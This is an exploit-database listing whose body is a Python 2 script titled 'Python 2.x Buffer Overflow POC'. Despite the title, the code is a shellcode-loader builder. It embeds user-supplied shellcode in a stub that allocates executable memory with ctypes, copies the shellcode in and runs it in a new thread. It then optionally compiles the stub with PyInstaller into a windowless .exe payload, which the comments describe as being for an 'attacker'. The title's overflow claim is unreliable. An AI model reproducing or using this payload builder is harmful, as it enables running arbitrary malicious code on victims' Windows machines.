Python 2.x Buffer Overflow



EKU-ID: 6239 CVE: OSVDB-ID:
Author: Chaitanya Haritash Published: 2017-01-24 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/env python

###
#Exploit         : Python 2.x Buffer Overflow POC
#Tested on       : Windows XP , Windows 7
#Authors         : Sultan Albalawi & Chaitanya [@bofheaded] 
#Discovery date  : 21/jan/2017
#GitHub          : https://github.com/ChaitanyaHaritash/My-Exploits/blob/master/python2.x_bof.py
#Video 		 : https://youtu.be/hcc6Y55PWBg
#Image 		 : https://postimg.org/image/dn5x3ww9v/
###

###
# Usage ::::
###
#1. Run exploit.py
#2. Save your shellcode into some text file
#3. Input Path of text file containing shellcode
#4. The .py file will be generated with shellcode.
#5. *Optional - Attacker just need to select option 'y' in running code.. and can have .exe payload from .py code generated :)

###
# NOTE ::::
###
#pyinstaller must be installed if user wants exe payload from python payload generated initially
#This exploit is windows compatible :) 

#calc.exe shellcode =>
#http://pastebin.com/vBssgg99

import time,shutil,os,sys
if os.name == 'posix':
  print "Sorry this exploit is not compatible to linux :( "
  exit()
else:    

      banner = """
               Python 2.x Buffer Overflow POC
      Authors : Sultan Albalawi & Chaitanya [@bofheaded]
	       Susupcious Shell Activity [SSA] 
               """
      print banner
      class make:
          def __init__(self,):
                print ""
          def fii (self,):
              print ""
          if __name__ == '__main__':

                shell = str(raw_input('Input Path To Your shellcode.txt file >> '))
        
                txt = open(shell) 
                myshell = txt.read()
                raw = """
import ctypes
ban=10
for i in range(ban):
    print "|/"*i
shellcode = bytearray("""+myshell+""")
myci = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                          ctypes.c_int(len(shellcode)),
                                          ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))

buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)

ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(myci),
                                     buf,
                                     ctypes.c_int(len(shellcode)))

ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.c_int(myci),
                                         ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.pointer(ctypes.c_int(0)))

ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
                """

                f = open ('stub.py' , 'w')
                f.write(raw)
                f.close()
                print "done !"
                
                build_exe = str(raw_input('Would You like to have an executable payload ? (y|n)>> '))  
                if build_exe == 'y':
                    os.system('C:\Python27\Scripts\pyinstaller --noconsole --onefile stub.py')
                    print "Please Wait ...."
                    time.sleep(2)
                else:
                    print ('byee')        
                  
      make()